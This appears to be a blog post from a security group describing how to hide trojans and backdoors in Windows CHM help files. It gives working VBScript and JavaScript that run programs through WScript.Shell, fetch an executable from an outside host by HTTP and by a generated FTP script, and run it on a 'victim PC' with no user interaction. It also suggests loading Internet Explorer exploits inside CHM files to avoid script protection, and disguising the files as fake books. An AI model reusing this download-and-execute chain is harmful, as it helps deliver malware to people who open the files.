Execute with .CHM file.


Hi .

In this post i wanna talk about Execute with CHM file or be honest How we can run Trojan, Backdoor In CHM file ? and we will have a few talk Bypass Script Protection In IE .

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine Of CHM :

CHM run HTML page Based On Internet Explorer Engine .

when you run “VBSCRIPT” or “Activex”  or “Object” with Internet Explorer 7 or higher , Script Protection (Activex Security Control) , Alert To  User & Block Script .

ie-activex-security-control

when we are during running  a CHM file , we Can Run & Execute “Object” + “Vb Script” + “JavaScript “ Without Any Error , but If  our Script  inclusive  ActiveX control , We will See a Basic Alert .

Execute IN CHM :

we Need A Program To Create CHM file , I like to  USE WINCHM (free Edition) :

http://www.softany.com/winchm/

For Edit VBSCRIPT  [With IDE] :

http://www.vbsedit.com/

vbseditor

Offline Mode (Intro) :

With This Object ID :

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call “Windows Script Host Shell Object ” with Object :

Example :
<html>
<object id=”wsh”
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
<script>
wsh.Run(“c:\windows\system32\calc.exe”);
</script>
</html>

Or  :

<HTML>
<SCRIPT>
function PROCJavascriptRunProgramParameter( programNameS,
parameterS )
{
var shell = new ActiveXObject(“WScript.Shell”);
var quoteS = String.fromCharCode( 34 );
shell.run( quoteS + programNameS + quoteS + ” ” + parameterS, 1,
false );
self.close();
}
</SCRIPT>
<BODY ONLOAD=’PROCJavascriptRunProgramParameter( “C:/windows/system32/calc.exe”, “names.nsf” );’>
</BODY>


Online Mode (Backdoor & Script Bypass Mode ) :

we have three Step to do :

1- Download .EXE file (without User InterAction)
2- Save File in Victim PC .
3- RUN It .

for download with VBSCRIPT  I USED This Objects :

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following This Example :

<script language=vbscript>
Dim Http
Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1″)
URL = “http://abysssec.com”
‘Send request To URL
Http.Open “GET”, URL, False
Http.Send
‘Get response data As a string
BinaryGetURL = Http.ResponseBody
</script>

SAVE FILE  [ Achilles heel  IN CHM ] :

Save File & Execute Objects , Run Activex In IE & CHM .

IF You Can Find a way to bypass ActiveX Alert You can Find lot’s of BUG‘s .

Example OF Bug :

http://www.milw0rm.com/exploits/719 [2004]

Activex Alert :

alert

Note : we have some bypass trick maybe we disclosure a few of them here soon .

But until that Time You can use This method for Download [FTP Client ] :

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

‘Change this, foldername = local dir (where files must be ftp’d TO)
strLocalFolderName = “c:\”

‘ Server where you are ftp’ing TO
strFTPServerName = “abysssec.com”

‘ Username you use to ftp
strLoginID = “test”

‘ Initialize variables
strPassword = “test”
strFTPServerDir = “/www”

‘ Change this to the folder where the files are on the source server
strFTPServerFolder = “/www”

‘The follow lines of code generate the FTP script file on the fly,
‘because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & “\FTPScript.txt”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
‘objMyFile.WriteLine (“ftp -s open ” & strFTPServerName)
objMyFile.WriteLine (“open ” & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

‘strFTPServerDir = InputBox(“Enter directory from which to ftp:”)

‘objMyFile.WriteLine (“cd ” & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine (“cd ” & strFTPServerFolder)
‘objMyFile.WriteLine (“bin”)
objMyFile.WriteLine (“lcd ” & strLocalFolderName)
objMyFile.WriteLine (“get EF.exe”)
objMyFile.WriteLine (“bye”)
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

‘The following code executes the FTP script. It creates a Shell
‘object and run FTP program on top of it.
Set objShell = WScript.CreateObject( “WScript.Shell” )
objShell.Run (“ftp -s:” & chr(34) & strFTPScriptFileName & chr(34))
‘objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject(“Scripting.FileSystemObject”)
CleanPath=”c:\”

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

For Execute You can use it:

<script language=vbscript>
set  shell = CreateObject(“WScript.Shell”)
shell.run( “cmd.exe” )
</script>

——————————————————————————————————————————————-

Bypass Script Protection in CHM :

When You Run This Exploit [ Last Of IE 7 Exploit In this Time ] :

http://www.milw0rm.com/exploits/7410

This Exploit Detect By IE Script Security Protection . You Can Run This Exploit in CHM & Don’t Worry For Execution through  “Heap Spray” Method  .

final

Test IT :

http://abysssec.com/files/Execute-with-IE.chm

OK , deduction :

1 – We can put Backdoor & Trojan in CHM files [Fake Book ]

2- We Can Run IE Exploit in CHM files .

3- We Can Execute & Download & Upload with chm files .

4- We Can Run All COM & DLL Objeects with it .

In future :

1- talk about Heap Spray Method  .

2- Talk About Fuzzing OBJECT .

3- Talk About Bypass Activex Question in .CHM [ If i found It !!!!]


Question ?

———————————————–

abysssec comment problem solved fill free to write your comment and mail your request and questions to us .

DAphne

Comments are closed.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes